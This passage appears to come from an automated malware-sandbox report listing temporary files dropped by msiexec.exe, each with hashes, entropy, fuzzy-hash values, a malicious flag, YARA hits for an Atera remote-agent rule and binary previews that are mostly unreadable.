                                                                                                                                                                                                                                                                                                                                  Preview:t.,....(... <$.M. .=..........l.............o.c...gWSl..SW..WS[//d.d l$.XX%.......................q.y}aD%mQ.Y]A..M1...!.)........................................}...m..q]}}aMm.U=].E-M.5.=.%.-.......................e.......G.....v.@....qeymee1m.......c.)!!.)g..?.....K.7.+.OH..... .D@..0....e..dXH......P..(..]UU-]......kS.kk.....C.WO7'.[.<X44....,..$.8... ...}..\......@.5km!U.gL.8..g....-....._..k#+G##.LP8.H.@......0...T.......Y..D.........1II.1.o.s..Cg..G.....O.Og.CL<L.P.......p.d$........Y..L......<.. ...III.1..k_.....o.oGO?.....H.,@.X.P. ......p..,...\......m..<.....]YMEE.M..w[..[..{os.....O.C_G.t$l.D8\..........,.......}..]..`.........)5M.5.o.W_...sO3.SGk....h$.`,...4.L.$.<..........@...d...e}}1e.D.....o...S)!!.)g.GsK?..0.....#.h$P(.\\...........x(..am.I...p....H.......=9.!S3.wgksK.......3[C ......(.......,...........q.ayyaa.YQQYYc9E%11%9._.......W{7;wSo.......`(h<......L.4..........ay.q...a}Qii]Q....5MM!5.wSl.-.....w'.+k3/..+d.....

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF070AB763D94BC4D6.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2532785006839884
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:ggduksNveFXJNT5VWe9FGqISoedGPdGfonrhSmStedGPdGRub1n:JdVlT3FTInVox
                                                                                                                                                                                                                                                                                                                                  MD5:D056A4E0BE5F23AFFDD317786ED981BE
                                                                                                                                                                                                                                                                                                                                  SHA1:B13A67B14F3DFDEE3BC37BDEE81CE2450BB5A61E
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC030C812D19ECBFD7CC292E955B78638A158F04318C00BE299ACBB4DAF13C4F
                                                                                                                                                                                                                                                                                                                                  SHA-512:D5E1D5F9DA64F0042BF2E969882D82B289BD03C898280927E0EE673B3BFE49EB284D3328016750A50933DC815A0F76219C66128E982DF2CB9DCD218C22C0DB9B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF070AB763D94BC4D6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF070AB763D94BC4D6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF0A06C579C6A4F39C.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07818414976654083
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOw6PKLIUgVky6lW:2F0i8n0itFzDHFw6CbW
                                                                                                                                                                                                                                                                                                                                  MD5:66A8243D5CED8CF9148F8DC9CC546A50
                                                                                                                                                                                                                                                                                                                                  SHA1:215EFA5036A53267D45365E39F2A13005CC139AA
                                                                                                                                                                                                                                                                                                                                  SHA-256:3DBBB36F35D8D48AEB28398470CF3D86E18B7CEA99721ACE711DAD9A60F8A27A
                                                                                                                                                                                                                                                                                                                                  SHA-512:AFEB6D7CAAB6F5027A3383500A10627F09E7F48B073C5F1E55C96B9D1129477C54B465042C2172315F01231BA4479A9CC874F7E3773702F5213F2A191633A992
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF1892425C492A552B.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF18D9F86597CA5126.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6016373332287588
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:v8PhTuRc06WXz+FT5RdXynMSjndddwEqdGUDjxbQiSsndddSE8ly:uhT1jFTlCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:65ECED2C79FFBFDA5DA7C3090F89513B
                                                                                                                                                                                                                                                                                                                                  SHA1:2DC29C13D2BF2E2527CFC4E929969436DBA0AA04
                                                                                                                                                                                                                                                                                                                                  SHA-256:A32952614B92F166011E18EA13A33E2D57896715C1B0B45EFE55A748D23D9AD6
                                                                                                                                                                                                                                                                                                                                  SHA-512:759F4544CB4E8C01EF89378155D54F3874A4B2CD7198F9C9F92F392C84442859874CEFFD77B119F89DE172FF8F9A355DA6F2C372B0E3EA6CF2C08E73B09EE188
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF18D9F86597CA5126.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF18D9F86597CA5126.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF1972A83F22094FA6.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6046824865930789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:QYz8Ph4uRc06WXzAFT5FRddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:Lah411FTvdWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:B92FF4A308F3B808673B7406600F4685
                                                                                                                                                                                                                                                                                                                                  SHA1:D67BCB2BE319C693B6EE2556516F093B93C0E2E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D3A6AEC26C39755D64BB97348F23917D9AED9FCCF952344969E231E9510AC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4BD28F2284DA96EEE715B9A30C5F0EEB778EFD4DE530F04E97476592E121E9BF9A33EF88CFE8BD0AEB19F48BC58EF4A47736C6AD4E96EE7979DF4703601D9D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF1972A83F22094FA6.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF1C00FBBD710D10C8.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF1D98EA98A0F27BD7.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.278218715250536
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:VOLuXth8FXz/T5b/dXynMSjndddwEqdGUDjxbQiSsndddSE8ly:gLXBTVVCnMf3DtNaE
                                                                                                                                                                                                                                                                                                                                  MD5:F86B0BFFC128D2A5E37EE400EB92F02F
                                                                                                                                                                                                                                                                                                                                  SHA1:1881A81F7AF0442DF010985DC914E5374E458899
                                                                                                                                                                                                                                                                                                                                  SHA-256:C70304084C95123C5A99FAC85999E7587216DDD45860D07A49468BCB7ED7AF4C
                                                                                                                                                                                                                                                                                                                                  SHA-512:8C2B2C1E23742726CDF830CCECDE32582712073874775107A6C48089027667677F9628CC3CA9E95F267D300B949FDCD13CE9012351F136F1B8F4B1954F290252
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF1D98EA98A0F27BD7.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF1F021C278EEE6170.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF2093E884E82D2C4A.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF2656B9360466B367.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF2A0996088580098E.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF2FF6D9DA5DD4685F.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF3511A9D693281154.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.07957035983066839
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOxgIYqICN/K9IKLIUSVky6l/X:2F0i8n0itFzDHFxgIjNxKR/X
                                                                                                                                                                                                                                                                                                                                  MD5:C584EBAB63FADE959CA713DE5E61B9FE
                                                                                                                                                                                                                                                                                                                                  SHA1:04626806B95D1B8C9B3212C646EA715217A95E6A
                                                                                                                                                                                                                                                                                                                                  SHA-256:324A20E8D4B0FD8D553397ECEA4877E20BB7B1DC2B709BAB914AD75C11BEAE5D
                                                                                                                                                                                                                                                                                                                                  SHA-512:F3633B74C48AEE72D5F5AC77F2A2D15FF86922026FEF75DC5087A60BCB83935B7E4FA5CD56207B3F120B5A21495BA25472597CFCEBE30EDAAF550644EF97FACA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF38618E7B95C7FC71.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):512
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3::
                                                                                                                                                                                                                                                                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF38B1B8C320DF517A.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2551492331884888
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:e69u5th8FXz/T5idm3qhSjnd/EqdGUDjxbQ6Ssnd/E8Q:d9RBTkm3qhI3DtNPQ
                                                                                                                                                                                                                                                                                                                                  MD5:1D2589CA75F98D7C99E00B483C9F6B67
                                                                                                                                                                                                                                                                                                                                  SHA1:79115956B2C206DE8C8ECBA56EBA54F6D51E8211
                                                                                                                                                                                                                                                                                                                                  SHA-256:E0FC60527FE35549AFCAC0E62DB5744042BEB486E6AE4DB20F73F49BC2BEDF05
                                                                                                                                                                                                                                                                                                                                  SHA-512:DC9B75AEE923AB079E91B60754D5931C664E69C3410F41022FE4C33A1B5BFEE5B23BA280E0FBD3AB0FD9F7C7A66C41F552269565449825DA0A0E0BF50E47C4A0
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Temp\~DF38B1B8C320DF517A.TMP, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF3D1D5E9DA89E1DF3.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF43EB924B57BC6258.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):147456
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.094953908748899
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:MxucuA5YHr6gsffcvSOxWX5WclJnJjCL0IcuA5YHr6gsffcvSOxWX5WclJnJjC:2vdGHPssvS8c15dGHPssvS8c
                                                                                                                                                                                                                                                                                                                                  MD5:72C2BDF3D07A65200CA34E668DC4AB91
                                                                                                                                                                                                                                                                                                                                  SHA1:F6DF3315F64A44B73C90B7D6034629E4A4276593
                                                                                                                                                                                                                                                                                                                                  SHA-256:058F6F6474964727D496CA4469E2A69F309EB5C0D14D7F522D84B38CFBD09920
                                                                                                                                                                                                                                                                                                                                  SHA-512:496E4FFE72C8B4C645562858FB0255FB96886961D073B4D285A153A6D78E1F8E8238ED66E3FCC295217E548F3C32AF8522164A3CC6F3CC689D955E4AF45E09E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\~DF45939A071886D6FE.TMP

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6046824865930789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
